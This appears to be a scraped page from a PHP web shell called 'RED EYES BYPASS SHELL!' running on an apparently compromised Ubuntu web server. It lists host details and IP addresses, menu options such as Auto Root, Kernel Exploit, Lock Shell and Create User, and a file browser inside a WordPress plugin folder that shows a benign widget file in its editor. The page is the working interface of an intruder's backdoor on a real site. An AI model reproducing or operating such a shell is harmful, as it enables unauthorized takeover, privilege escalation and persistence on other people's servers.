Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
monarch /
includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
index.php
271.02
KB
-rwxr-xr-x
monarch-widget.php
1.47
KB
-rwxr-xr-x
monarch_options.php
51.26
KB
-rwxr-xr-x
oauth.php
28.31
KB
-rwxr-xr-x
twitter_auth.php
8.65
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : monarch-widget.php
<?php if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } class MonarchWidget extends WP_Widget { function __construct(){ $widget_ops = array( 'description' => esc_html__( 'Monarch plugin widget, please configure all the settings in Monarch control panel', 'Monarch' ), ); parent::__construct( false, $name = esc_html__( 'Monarch Follow', 'Monarch' ), $widget_ops ); } /* Displays the Widget in the front-end */ function widget( $args, $instance ){ extract( $args ); $title = apply_filters( 'et_social_widget_title', esc_html( $instance['title'] ) ); echo $before_widget; if ( $title ) { echo $before_title . $title . $after_title; } echo ET_Monarch::display_widget(); echo $after_widget; } /* Saves the settings. */ function update($new_instance, $old_instance){ $instance = $old_instance; $instance['title'] = sanitize_text_field( $new_instance['title'] ); return $instance; } /* Creates the form for the widget in the back-end. */ function form( $instance ){ //Defaults $instance = wp_parse_args( (array) $instance, array( 'title' => esc_html__( 'Follow Us', 'Monarch' ), ) ); $title = $instance['title']; # Title printf( '<p> <label for="%1$s">%2$s: </label> <input class="widefat" id="%1$s" name="%4$s" type="text" value="%3$s" /> </p>', esc_attr( $this->get_field_id( 'title' ) ), esc_html__( 'Title', 'Monarch' ), esc_attr( $title ), esc_attr( $this->get_field_name( 'title' ) ) ); } }
Close